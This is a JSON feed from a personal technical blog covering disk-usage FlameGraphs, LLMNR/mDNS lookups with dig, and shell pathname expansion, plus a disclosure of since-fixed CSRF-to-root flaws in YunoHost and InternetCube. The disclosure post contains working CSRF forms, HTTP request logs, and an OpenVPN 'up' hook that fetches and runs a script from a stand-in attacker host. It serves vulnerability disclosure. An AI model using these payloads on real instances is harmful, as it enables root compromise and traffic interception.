{"version": "https://jsonfeed.org/version/1", "title": "/dev/posts/", "home_page_url": "https://www.gabriel.urdhr.fr", "feed_url": "/feed.json", "items": [{"id": "http://www.gabriel.urdhr.fr/2019/11/18/flamegraph-disk-usage/", "title": "Disk usage with FlameGraph", "url": "https://www.gabriel.urdhr.fr/2019/11/18/flamegraph-disk-usage/", "date_published": "2019-11-18T00:00:00+01:00", "date_modified": "2019-11-18T00:00:00+01:00", "tags": ["computer", "flamegraph"], "content_html": "

Using FlameGraph\nfor displaying disk usage.

\n

In a previous episode,\nI wrote a simple script to generate line-of-code\nvisualizations using Flamegraph.\nThis is the same thing for disk usage:

\n
find . -type f -print0 |\nxargs -0 du -b -- |\nsed 's/^ *\\([0-9]*\\)\\s*\\(.*\\)/\\2 \\1/' |\nsed 's|^./||' |\nsed 's|/|;|g' |\n./flamegraph.pl\n
\n\n\n
\n\n \"\"\n\n
Disc usage of SimGrid source code
\n
\n\n

It could be used as an alternative to tools like ncdu.

"}, {"id": "http://www.gabriel.urdhr.fr/2019/04/02/llmnr-mdns-cli-lookup/", "title": "Using dig as a LLMNR or mDNS CLI Lookup utility", "url": "https://www.gabriel.urdhr.fr/2019/04/02/llmnr-mdns-cli-lookup/", "date_published": "2019-04-02T00:00:00+02:00", "date_modified": "2019-04-02T00:00:00+02:00", "tags": ["computer", "network", "dns"], "content_html": "

I was looking for a LLMNR commandline lookup utility.\nActually, dig can do the job quite fine.

\n

LLMNR usage

\n

LLMNR (Link-Local Multicast Name Resolution),\nRFC4795,\nis a Microsoft-centric DNS-based protocol for resolving names using multicast\non the local network.\nIt is expected to be used by default for single label names only:

\n
\n

By default, an LLMNR sender SHOULD send LLMNR queries only for\nsingle-label names. Stub resolvers supporting both DNS and LLMNR\nSHOULD avoid sending DNS queries for single-label names, in order to\nreduce unnecessary DNS queries.

\n
\n

In the Windows world,\nit is used alongside with other protocols1\nsuch as NBNS/NBT-NS (NetBios/TCP Name Service,\nRFC1001,\nRFC1002),\nWINS\nand DNS.\nApparently, LLMNR is tried before NBNS but it's not really documented\nAFAIU.

\n

LLMNR is quite similar in spirit to mDNS\n(multicast DNS, RFC6762).\nmDNS is originated from Apple Bonjour\nwhere it is used with DNS-SD\n(DNS Service Discovery, RFC6783)\nand has been available on Linux systemd for a long time\nthrough Avahi.\nIt is normally used for domain names in the local domain\n(eg. foo.local, foo.bar.local, etc.).

\n

On Linux systems, in addition to Avahi,\nsystem-resolved\nsupports both LLMNR and mDNS/DNS-SD.

\n

LLMNR lookup with dig

\n

I was looking for a CLI tool for resolving names with LLMNR but could not\nfind any. In fact, dig can be the job well.\nLLMNR is really DNS with a few changes:

\n\n

LLMNR header:

\n
\n1  1  1  1  1  1\n0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                      ID                       |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|QR|   Opcode  | C|TC| T| Z| Z| Z| Z|   RCODE   |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    QDCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    ANCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    NSCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    ARCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n
\n\n

DNS header:

\n
\n                                1  1  1  1  1  1\n  0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                      ID                       |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|QR|   Opcode  |AA|TC|RD|RA|   Z    |   RCODE   |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    QDCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    ANCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    NSCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    ARCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n
\n\n

This means we can actually do LLMNR requests with dig.\nDor example, we can do a\nDNS\nWPAD\n\"\ud83d\ude28\" request:

\n
dig +noedns -p 5355 @224.0.0.252 wpad\n
\n\n\n

EDNS0 is disabled because the\nMicrosoft LLMNR profile does not support EDNS0:

\n
\n

The Link Local Multicast Name Resolution (LLMNR) Profile [...]\ndoes not support Extension Mechanisms for DNS (EDNS0) [RFC2671].

\n
\n

mDNS lookup with dig

\n

Similarly for mDNS, requests are sent to 224.0.0.251 or ff02::fb on UDP port 5353.\nFull mDNS queries\nare expected to send queries from this same IP/port tuple\n(and receive the answer on this same tuple):

\n
\n

A compliant Multicast DNS querier, which implements the rules\nspecified in this document, MUST send its Multicast DNS queries from\nUDP source port 5353 (the well-known port assigned to mDNS), and MUST\nlisten for Multicast DNS replies sent to UDP destination port 5353 at\nthe mDNS link-local multicast address** (224.0.0.251 and/or its IPv6\nequivalent FF02::FB).

\n
\n

This cannot be done with dig: it cannot listen for answers sent to a multicast\naddress.

\n

However, the mDNS protocol allows for a simpler client implementation,\nOne-Shot Multicast DNS Queries:

\n
\n

The most basic kind of Multicast DNS client may simply send standard\nDNS queries blindly to 224.0.0.251:5353, without necessarily even\nbeing aware of what a multicast address is.\n[...]\nthese queries MUST NOT be sent using UDP source port 5353, since\nusing UDP source port 5353 signals the presence of a fully compliant\nMulticast DNS querier, as described below.

\n
\n

This means we can use dig as well:

\n
dig -p 5353 @224.0.0.251 example.local\n
\n\n\n

Lookup with resolvectl

\n

Alternatively if systemd-resolved is running, resolvectl can be used:

\n
resolvectl query -p llmnr example\nresolvectl query -p mdns example.local\n
\n\n\n
\n
\n
    \n
  1. \n

    Apparently there is as well\nPNRP\n(Peer Name Resolution Protocol)\nand\nSNID\n(Server Network Information Discovery).\u00a0\u21a9

    \n
  2. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2019/03/29/surprising-shell-pathname-expansion/", "title": "Surprising shell pathname expansion", "url": "https://www.gabriel.urdhr.fr/2019/03/29/surprising-shell-pathname-expansion/", "date_published": "2019-03-29T00:00:00+01:00", "date_modified": "2019-03-29T00:00:00+01:00", "tags": ["computer", "unix", "shell"], "content_html": "

I thought I was understanding pretty well how bash argument processing and\nvarious expansions is supposed to behave. Apparently, there are still\nsubtleties which tricks me, sometimes.

\n

Question: what is the (standard) output of the following shell command? \"\ud83e\udd14\"

\n
a='*' ; echo $a\n
\n\n\n

The answer is below this anti-spoiler protection.

\n


\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n

\n

Answer

\n

Here's the command again:

\n
a='*' ; echo $a\n
\n\n\n

I would have said that the answer was *, obviously.\nBut this is wrong.\nThe output is the list of files in the current directory.\n\"\ud83d\ude32\"

\n

The content of the a variable is * because the assignment is single-quoted.\nFor example, this shell command does output *:

\n
a='*' ; echo \"$a\"\n
\n\n\n

However, in echo $a, * is pathname-expanded into the list of files\nin the current directory.\nI would not have thought that pathname expansion would trigger in this case.

\n

Explanation

\n

This is indeed the behaviour specified for POSIX shell\nWord Expansions:

\n
\n

The order of word expansion shall be as follows:

\n
    \n
  1. \n

    Tilde expansion (see Tilde Expansion), parameter expansion\n (see Parameter Expansion), command substitution (see Command Substitution),\n and arithmetic expansion (see Arithmetic Expansion) shall be performed,\n beginning to end. See item 5 in Token Recognition.

    \n
  2. \n
  3. \n

    Field splitting (see Field Splitting) shall be performed on the portions\n of the fields generated by step 1, unless IFS is null.

    \n
  4. \n
  5. \n

    Pathname expansion (see Pathname Expansion) shall be performed,\n unless set -f is in effect.

    \n
  6. \n
  7. \n

    Quote removal (see Quote Removal) shall always be performed last.

    \n
  8. \n
\n
\n

Pathname expansions happens after variable expansion.\nI think I would have said it was done before variable expansion\nand command substitution.

\n

Edit: I think what I actually found surprising is that\npattern matching characters\ncoming from expansions are actually active\npattern matching characters (instead of counting as ordinary characters).

\n

About Parameter Expansion\nPOSIX mandates that double-quotes prevents pathanme expansions from happening\n(i.e. if there is no quoting pahtname expansion happens):

\n
\n

If a parameter expansion occurs inside double-quotes:\nPathname expansion shall not be performed on the results of the expansion.

\n
\n

Of course,\nsingle quotes prevents pathname expansion\nfrom happening\n(in addition to preventing variable expansion and otherthings from happening):

\n
\n

Enclosing characters in single-quotes ('') shall preserve the literal value\nof each character within the single-quotes. A single-quote cannot occur within\nsingle-quotes.

\n
\n

This is not super surprising if we think about, for example:

\n
# List all HTML files:\next=html ; echo *.$ext\n
\n\n\n

This works as well with pattern matching:

\n
ext=html\nfor a in \"$@\"; do\n  case \"$a\" in\n    *.$ext)\n        echo \"Interesting file: $a\"\n        ;;\n    *)\n      echo \"Boring file: $a\"\n      ;;\n  esac\ndone\n
\n\n\n

Command Substitution

\n

About\nCommand Substitution\nPOSIX mandates:

\n
\n

If a command substitution occurs inside double-quotes, field splitting\nand pathname expansion shall not be performed on the results of the substitution.

\n
\n

Which means that this command\noutputs the list of file in the current directory as well:

\n
echo $(echo '*')\n
\n\n\n

Context

\n

It took me some time to understand what\nwas happening when debugging a slightly more convoluted example\nfrom YunoHost:

\n
ynh_mysql_execute_as_root \"GRANT ALL PRIVILEGES ON *.* TO '$db_admin_user'@'localhost' IDENTIFIED BY '$db_admin_pwd' WITH GRANT OPTION;\n  FLUSH PRIVILEGES;\" mysql\n
\n\n\n

Inside ynh_mysql_execute_as_root, the parameters are assigned to local\nvariables with this (bash) code:

\n
arguments[$i]=\"${arguments[$i]//\\\"/\\\\\\\"}\"\narguments[$i]=\"${arguments[$i]//$/\\\\\\$}\"\neval ${option_var}+=\\\"${arguments[$i]}\\\"\n
\n\n\n

This code is obviously vulnerable to shell command code injection\nin the eval line\nthrough backticks and backslashes.\nWhat surprised me\nis that pathname expansion was happening in *.*.\nThis is because ${arguments[$i]} is not double-quoted in the last line\nand this is completely unrelated to eval.

\n

For reference, the correct and simple way to proceed,\nwhich avoids unwanted command injection and pathname expansion is:

\n
eval ${option_var}+='\"${arguments[$i]}\"'\n
\n\n\n

Conclusion

\n

Unquoted variable expansion and command substitutions\nare trickier than I thought.

\n

When variable expansion or command substitution happens unquoted,\npathname expansion might possibly happen. I think this might have security\nimplications for some shell scripts out there.

"}, {"id": "http://www.gabriel.urdhr.fr/2019/02/12/yunohost-rce-csrf/", "title": "Remote Code Execution via Cross Site Request Forgery in InternetCube and YunoHost", "url": "https://www.gabriel.urdhr.fr/2019/02/12/yunohost-rce-csrf/", "date_published": "2019-02-12T00:00:00+01:00", "date_modified": "2019-02-12T00:00:00+01:00", "tags": ["computer", "web", "security", "yunohost"], "content_html": "

How I found remote code execution vulnerabilities\nvia CSRF\non the administration interfaces\nof InternetCube applications\nand of the YunoHost administration interface\nwhich would have been used to execute arbitrary code as root.\nThese vulnerabilities were fixed in YunoHost 3.3, OpenVPN Client app 1.3.0.\nand YunoHost 3.4.

\n

This post was written before these fixes were\nincluded and describes the previous behavior.\nYou currently cannot reproduce the vulnerabilities described here\non the demo instance anymore.

\n

CSRF in the BriqueIntenet Applications

\n

CSRF in OpenVPN Client Application

\n

While trying to help some user of LDN's\nVPN,\nI found those lines of shell script\nin vpnclient_ynh,\nthe YunoHost application which manages the OpenVPN client on InternetCube:

\n
curl -kLe \"https://${ynh_domain}/yunohost/sso/\" \\\n  --data-urlencode \"user=${ynh_user}\" \\\n  --data-urlencode \"password=${ynh_password}\" \\\n  \"https://${ynh_domain}/yunohost/sso/\" \\\n  --resolve \"${ynh_domain}:443:127.0.0.1\" -c \"${tmpdir}/cookies\" \\\n  2> /dev/null | grep -q Logout\n\noutput=$(curl -kL -F \"service_enabled=${ynh_service_enabled}\"\n  \\ -F _method=put -F \"cubefile=@${cubefile_path}\"\n  \"https://${ynh_domain}/${ynh_path}/?/settings\" \\\n  --resolve \"${ynh_domain}:443:127.0.0.1\" -b \"${tmpdir}/cookies\" \\\n  2> /dev/null | grep RETURN_MSG | sed 's/<!-- RETURN_MSG -->//' \\\n  | sed 's/<\\/?[^>]\\+>//g' | sed 's/^ \\+//g')\n
\n\n\n

These shell commands trigger a reconfiguration of the VPN client application:

\n
    \n
  1. \n

    the first command logs in on SSOwat,\n the SSO middleware used on the InternetCube,\n and gets a session cookie;

    \n
  2. \n
  3. \n

    the second command requests a reconfiguration of the VPN\n with this session.

    \n
  4. \n
\n

Reading those two shell commands,\nyou can suspect that the application is probably vulnerable to CSRF attacks.\nThe second request can be trigerred from a third-party website\nbecause this is a simple request\n(a POST with multipart/form-data payload without custom HTTP header)\nwhich does not include a CSRF token.

\n

Here is the detail of the messages:

\n
POST /yunohost/sso/ HTTP/1.1\nHost: yunohost.test\nUser-Agent: curl/7.58.0\nAccept: */*\nReferer: https://yunohost.test/yunohost/sso/\nContent-Length: 29\nContent-Type: application/x-www-form-urlencoded\n\nuser=johndoe&password=patator\n
\n\n\n
HTTP/1.1 302 Moved Temporarily\nServer: nginx\nDate: Sat, 26 May 2018 23:49:53 GMT\nContent-Type: text/html\nContent-Length: 154\nConnection: keep-alive\nX-SSO-WAT: You've just been SSOed\nSet-Cookie: SSOwAuthUser=johndoe; Domain=.yunohost.test; Path=/; Expires=Sun, 03 Jun 2018 01:49:53 UTC;; Secure\nSet-Cookie: SSOwAuthHash=55a09d6ccce21345b63de281a95fa3aeee97a305e19c27b95db8f2758266dce7669f683dc42e4215cf20fbf58ef78c9b96979cfd51ab7f94204a3277be22e729; Domain=.yunohost.test; Path=/; Expires=Sun, 03 Jun 2018 01:49:53 UTC;; Secure\nSet-Cookie: SSOwAuthExpire=1527983393.419; Domain=.yunohost.test; Path=/; Expires=Sun, 03 Jun 2018 01:49:53 UTC;; Secure\nLocation: https://yunohost.test/yunohost/sso/\nStrict-Transport-Security: max-age=63072000; includeSubDomains; preload\nContent-Security-Policy: upgrade-insecure-requests\nContent-Security-Policy-Report-Only: default-src https: data: 'unsafe-inline' 'unsafe-eval'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nX-Frame-Options: SAMEORIGIN\n
\n\n\n
POST /vpnadmin/?/settings HTTP/1.1\nHost: yunohost.test\nUser-Agent: curl/7.58.0\nAccept: */*\nCookie: SSOwAuthExpire=1527983393.419; SSOwAuthHash=55a09d6ccce21345b63de281a95fa3aeee97a305e19c27b95db8f2758266dce7669f683dc42e4215cf20fbf58ef78c9b96979cfd51ab7f94204a3277be22e729; SSOwAuthUser=johndoe\nContent-Length: 817\nContent-Type: multipart/form-data; boundary=------------------------df246192f1b4f4b2\n\n--------------------------91ecd6f6b2b63ea9\nContent-Disposition: form-data; name=\"service_enabled\"\n\n1\n--------------------------91ecd6f6b2b63ea9\nContent-Disposition: form-data; name=\"_method\"\n\nput\n--------------------------91ecd6f6b2b63ea9\nContent-Disposition: form-data; name=\"cubefile\"; filename=\"test.\ncube\"\nContent-Type: application/octet-stream\n\n{\n  \"server_name\": \"vpn.attacker.test\",\n  \"server_port\": \"9000\",\n  \"server_proto\": \"tcp\",\n  \"crt_client_ta\": \"\",\n  \"login_user\": \"test\",\n  \"login_passphrase\": \"test\",\n  \"dns0\": \"89.234.141.66\",\n  \"dns1\": \"2001:913::8\",\n  \"openvpn_rm\": [\n    \"\"\n  ],\n  \"openvpn_add\": [\n    \"\"\n  ],\n  \"ip6_net\": \"2001:db8::/48\",\n  \"ip4_addr\": \"192.0.2.42\",\n  \"crt_server_ca\": \"-----BEGIN CERTIFICATE-----|...|-----END CERTIFICATE-----\",\n  \"crt_client\": \"\",\n  \"crt_client_key\": \"\"\n}\n--------------------------91ecd6f6b2b63ea9--\n
\n\n\n
HTTP/1.1 302 Moved Temporarily\nServer: nginx\nDate: Sat, 26 May 2018 23:49:53 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nX-SSO-WAT: You've just been SSOed\nSet-Cookie: SSOwAuthRedirect=;; Path=/yunohost/sso/; Expires=Thu, 01 Jan 1970 00:00:00 UTC;; Secure\nX-Limonade: Un grand cru qui sait se faire attendre\nSet-Cookie: LIMONADE0x5x0=r9qvidch2vc519drn9758n3kg2; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nLocation: /vpnadmin/\nStrict-Transport-Security: max-age=63072000; includeSubDomains; preload\nContent-Security-Policy: upgrade-insecure-requests\nContent-Security-Policy-Report-Only: default-src https: data: 'unsafe-inline' 'unsafe-eval'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nX-Frame-Options: SAMEORIGIN\n
\n\n\n

While the user is currently logged-in on his YunoHost instance,\na malicious website can make the user's browser issue this request\n(including the user's cookies)\nand trigger a VPN reconfiguration on the user's behalf.\nThis can be achieved using a (possibly auto-submitting) HTML form like this one\nfrom the malicious website (or with fetch):

\n
<form action=\"https://yunohost.test/vpnadmin/?/settings\"\n      method=\"POST\"\n      enctype=\"multipart/form-data\">\n  <input type=\"hidden\" name=\"service_enabled\" value=\"1\">\n  <input type=\"hidden\" name=\"_method\" value=\"put\">\n  <input type=\"hidden\" name=\"server_name\" value=\"vpn.attacker.test\">\n  <input type=\"hidden\" name=\"server_port\" value=\"1194\">\n  <input type=\"hidden\" name=\"server_proto\" value=\"tcp\">\n  <input type=\"hidden\" name=\"ip6_net\" value=\"\">\n  <input type=\"hidden\" name=\"raw_openvpn\" value=\"\n\n# [WARN] Edit this raw configuration ONLY IF YOU KNOW\n#        what you do!\n# [WARN] Continue to use the placeholders <TPL:*> and\n#        keep update their value on the web admin (they\n#        are not only used for this file).\n\nremote <TPL:SERVER_NAME>\nproto <TPL:PROTO>\nport <TPL:SERVER_PORT>\n\npull\nnobind\ndev tun\ntun-ipv6\nkeepalive 10 30\ncomp-lzo adaptive\nresolv-retry infinite\n\n# Authentication by login\n<TPL:LOGIN_COMMENT>auth-user-pass /etc/openvpn/keys/credentials\n\n# UDP only\n<TPL:UDP_COMMENT>explicit-exit-notify\n\n# TLS\ntls-client\n<TPL:TA_COMMENT>tls-auth /etc/openvpn/keys/user_ta.key 1\nremote-cert-tls server\nns-cert-type server\nca /etc/openvpn/keys/ca-server.crt\n<TPL:CERT_COMMENT>cert /etc/openvpn/keys/user.crt\n<TPL:CERT_COMMENT>key /etc/openvpn/keys/user.key\n\n# Logs\nverb 3\nmute 5\nstatus /var/log/openvpn-client.status\nlog-append /var/log/openvpn-client.log\n\n# Routing\nroute-ipv6 2000::/3\nredirect-gateway def1 bypass-dhcp\n  \">\n\n  <input type=\"file\" name=\"crt_server_ca\" value=\"\">\n  <input type=\"hidden\" name=\"crt_client\" value=\"\">\n  <input type=\"file\" name=\"crt_client_key\" value=\"\">\n  <input type=\"file\" name=\"crt_client_ta\" value=\"\">\n  <input type=\"hidden\" name=\"login_user\" value=\"johndoe\">\n  <input type=\"hidden\" name=\"login_passphrase\" value=\"1234\">\n  <input type=\"hidden\" name=\"dns0\" value=\"89.234.141.66\">\n  <input type=\"hidden\" name=\"dns1\" value=\"2001:913::8\">\n  <input type=\"file\" name=\"cubefile\" value=\"\" style=\"display: none;\">\n  <input type=\"submit\">\n</form>\n
\n\n\n

The whole sequence looks like this:

\n
\nUser  Browser  yunohost  www.attacker\n                .test       .test\n  |      |       |            |\n  |----->|       |            |   Login on yunohost.test\n  |      |       |            |\n  |      |------>|            |   POST /yunohost/sso/ HTTP/1.1\n  |      |       |            |\n  |      |<------|            |   HTTP/1.1 302\n  |      |       |            |   Set-Cookie: SSOwAuthUser=johndoe\n  |      |       |            |   Set-Cookie: SSOAuthHash=55a09d6ccce...\n  |      |       |            |   Set-Cookie: SSOwAuthExpire=1527983393.419\n  |      |       |            |\n  |      |       |            |   ... later ...\n  |      |       |            |\n  |----->|       |            |   Visit http://www.attacker.test/\n  |      |       |            |\n  |      |------------------->|   GET / HTTP/1.1\n  |      |       |            |\n  |      |<-------------------|   HTTP/1.1 200 OK\n  |      |       |            |   <form\n  |      |       |            |    action=\"https://yunohost.test/vpnadmin/?/settings\"\n  |      |       |            |    method=\"POST\"\n  |      |       |            |    enctype=\"multipart/form-data\">\n  |      |       |            |    ...\n  |      |       |            |  </form>\n  |      |       |            |  <script>document.forms[0].submit()</script>\n  |      |       |            |\n  |      |------>|            |   POST /vpnadmin/?/settings\n  |      |       |            |   Cookie: SSOwAuthUser=johndoe\n  |      |       |            |   Cookie: SSOAuthHash=55a09d6ccce...\n  |      |       |            |   Cookie: SSOwAuthExpire=1527983393.419\n  |      |       |            |\n  |      |       o            |   Reconfigure VPN\n
\n\n

The attacker could reconfigure the OpenVPN of the target YunoHost instance\nto use a differente VPN server (eg. vpn.attacker.test) and MITM all the\ntraffic going through the YunoHost instance.

\n

Command execution via OpenVPN configuration

\n

Moreover, the attacker can configure OpenVPN hooks (up, down, etc.)\nthrough the raw_openvpn form parameter and execute arbitray shell commands:

\n
up sh -c \"wget -nc -O /tmp/rootme.sh http://www.attacker.test/rootme.sh && sh /tmp/rootme.sh\"\n
\n\n\n

The OpenVPN instance runs as root, so these commands will run as root.

\n

CSRF in other BriqueIntenet applications

\n

Other InternetCube applications have the same structure:\nthey include a configuration web endpoint which relies completely on SSOwat\nfor access control and are probably vulnerable as well.\nThis includes\nhotspot_ynh,\npiratebox_ynh\nand\ntorclient_ynh.

\n

CSRF in the YunoHost administration interface

\n

The same kind of CSRF vulnerability is found in the main YunoHost interface.

\n

Creating new users

\n

If you try to add a new account on the demo instance,\nyour browsers sends this HTTP request:

\n
POST /yunohost/api/users HTTP/1.1\nHost: demo.yunohost.org\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: fr-FR,fr;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate, br\nReferer: https://demo.yunohost.org/yunohost/admin/\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: ...\nCookie: session.hashes=\"!ujY2IDH1jzw6da7pRz88Ig==?gAJVDnNlc3Npb2...=\";\n  session.id=821e7216b96b37e9e76bbcd4eb9e4a25856e6b6a;\n  ynhSecurityViewedItems=[]\nDNT: 1\nConnection: keep-alive\n\nusername=test&\nfirstname=Test&\nlastname=Test&\nemail=test&\ndomain=%40demo.yunohost.org&\nmailbox_quota=10M&\npassword=12345&\nconfirmation=12345&\nmail=test%40demo.yunohost.org&\nlocale=fr\n
\n\n\n

Here again, the request looks like it is vulnerable to CSRF:\nit is a simple\nurlencoded POST without CSRF token.

\n

Let's write some HTML to replicate the request:

\n
<form action=\"https://demo.yunohost.org/yunohost/api/users\" method=\"POST\">\n\n  <input type=\"hidden\" name=\"username\" value=\"johndoe\">\n  <input type=\"hidden\" name=\"firstname\" value=\"John\">\n  <input type=\"hidden\" name=\"lastname\" value=\"Doe\">\n  <input type=\"hidden\" name=\"domain\" value=\"@demo.yunohost.org\">\n\n  <input type=\"hidden\" name=\"mailbox_quota\" value=\"10M\">\n  <input type=\"hidden\" name=\"password\" value=\"12345\">\n  <input type=\"hidden\" name=\"confirmation\" value=\"12345\">\n  <input type=\"hidden\" name=\"mail\" value=\"doe@demo.yunohost.org\">\n  <input type=\"hidden\" name=\"locale\" value=\"fr\">\n\n  <input type=\"submit\">\n\n</form>\n
\n\n\n

If you are logged in on the admin interface of the YunoHost demo instance\nand if you validate this form from another website,\nit will trigger the creation of the new account\non your behalf on the demo instance.\nMost (if not all) administrative actions on YunoHost are vulnerable as well.

\n

Installing a custom plugin

\n

Installing an application from the list of application is done with this\nrequest:

\n
POST /yunohost/api/apps HTTP/1.1\nHost: demo.yunohost.org\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate, br\nReferer: https://demo.yunohost.org/yunohost/admin/\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: ...\nCookie: session.hashes=\"!ujY2IDH1jzw6da7pRz88Ig==?gAJVDnNlc3Npb2...=\";\n  session.id=821e7216b96b37e9e76bbcd4eb9e4a25856e6b6a;\n  ynhSecurityViewedItems=[]\nConnection: keep-alive\n\nlabel=myapp&app=toto&args=domain%3Ddemo.yunohost.org%26path%3D%252F30my_app%26is_public%3DYes&locale=fr\n
\n\n\n

As before, it is possible to trigger it with CSRF:

\n
<meta charset=\"UTF-8\">\n<form action=\"https://demo.yunohost.org/yunohost/api/apps\"\n      method=\"POST\"\n      enctype=\"application/x-www-form-urlencoded\">\n\n  <input name=\"label\" value=\"my_app\"> <br/>\n  <input name=\"app\" value=\"toto\"> <br/>\n  <input name=\"args\" value=\"domain=demo.yunohost.org&path=/my_app&is_public=Yes\"> <br/>\n  <input name=\"locale\" value=\"fr\"> <br/>\n\n  <input type=\"submit\">\n\n</form>\n
\n\n\n

We are not limited to installing the application from the list of known\napplications.\nWe can install a custom application from GitHub\nby replacing the value of the application ID in the app parameter\nby the github project URI:

\n
<meta charset=\"UTF-8\">\n<form action=\"https://demo.yunohost.org/yunohost/api/apps\"\n      method=\"POST\"\n      enctype=\"application/x-www-form-urlencoded\">\n\n  <input name=\"label\" value=\"botnet\"> <br/>\n  <input name=\"app\" value=\"https://github.com/randomstuff/botnet_ynh\"> <br/>\n  <input name=\"args\" value=\"domain=demo.yunohost.org&path=/botnet&is_public=Yes\"> <br/>\n  <input name=\"locale\" value=\"fr\"> <br/>\n\n  <input type=\"submit\">\n\n</form>\n
\n\n\n

By installing a custom YunoHost application,\nwe could execute arbitrary shell commands as root.

\n

List of vulnerable endpoints

\n

The yunohost.yml file defines the binding of YuonoHost commands to HTTP routes.\nFrom this file we can get a list of potentially vulnerable endpoints:

\n\n

Lack of CSRF vulnearbility in the user administration

\n

The request for changing the normal user password is:

\n
POST /yunohost/sso/password.html HTTP/1.1\nHost: demo.yunohost.org\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate, br\nReferer: https://demo.yunohost.org/yunohost/sso/password.html\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 50\n\ncurrentpassword=demo&newpassword=demo&confirm=demo\n
\n\n\n

It looks like this might be vulnerable to CSRF as well. However SSOwat has a\nCSRF protection based on the Referer header:

\n
if ngx.var.request_method == \"POST\" then\n  if hlp.string.starts(ngx.var.http_referer, conf.portal_url) then\n      if hlp.string.ends(ngx.var.uri, conf[\"portal_path\"]..\"password.html\")\n      or hlp.string.ends(ngx.var.uri, conf[\"portal_path\"]..\"edit.html\")\n      then\n         return hlp.edit_user()\n      else\n         return hlp.login()\n      end\n  else\n      -- Redirect to portal\n      hlp.flash(\"fail\", hlp.t(\"please_login_from_portal\"))\n      return hlp.redirect(conf.portal_url)\n  end\nend\n
\n\n\n

Thanks to this protection, this part of the application (where the users can\nchange their own settings) is not vulnerable to CSRF.\nThis protection only applies to SSOwat pages however.

\n

Exploitation

\n

It is necessary to target a specific YunoHost instance for conducting this attack:\nwe might argue that this would limit the impact of these vulnerabilities.\nIt is however very easy to get a\nlist of YunoHost instances with\na search engine such as Censys:

\n

\n

You could very easily build a list of YunoHost instances and try to CSRF them all,\nfor example by baiting their owner with a blog post about YunoHost \"\ud83d\ude09\".

\n

Updates

\n

Changes in YunoHost 3.3

\n

Since YunoHost 3.3, released in 2018-11-23,\nthe SameSite=lax\nparameter is now set to the SSOwat cookies.\nWith this setting, the browser does not send the\ncookie when the request is CSRF-able\n(i.e. when it is an unsafe HTTP methods, such as POST, coming from another origin).\nSupport for this cookie parameter is\nnot available in all browsers\nbut it is supposed to work on most evergreen browsers.

\n

This change is effective against the CSRF in VPN Client\nand should fix the CSRF in other InternetCube applications.

\n

However, this change alone does not prevent CSRF on the administration interface.\nThis is because the SameSite=lax setting is only\nset on the SSOwat cookies (SSOwAuthUser, SSOwAuthHash and SSOwAuthExpire)\nand not on Moulinette cookies (session.id, session.hashes).\nThe Moulinette API uses session.id and session.hashes cookies which do not\nhave the SameSite=lax parameter.

\n

Changes in OpenVPN Client app 1.3.0

\n

The OpenVPN client app 1.3.0, released in 2018-12-02, includes\na protection against CSRF.\nThose changes are needed to protect browsers without support for SameSite\ncookies. On browsers with SameSite support this change is not stricly needed.

\n

These changes have currently not been ported to the other vulnerable\nInternetCube apps. This is not a problem as long as the user browser has\nSameSite cookie support.

\n

Changes in YunoHost 3.4

\n

YunoHost 3.4, released in 2019-01-29, includes a\nbasic anti-CSRF fix in Moulinette.\nCunrrently it relies on the client adding a X-Requested-With HTTP header.

\n

References

\n

Issues and pull requests

\n\n

Informative

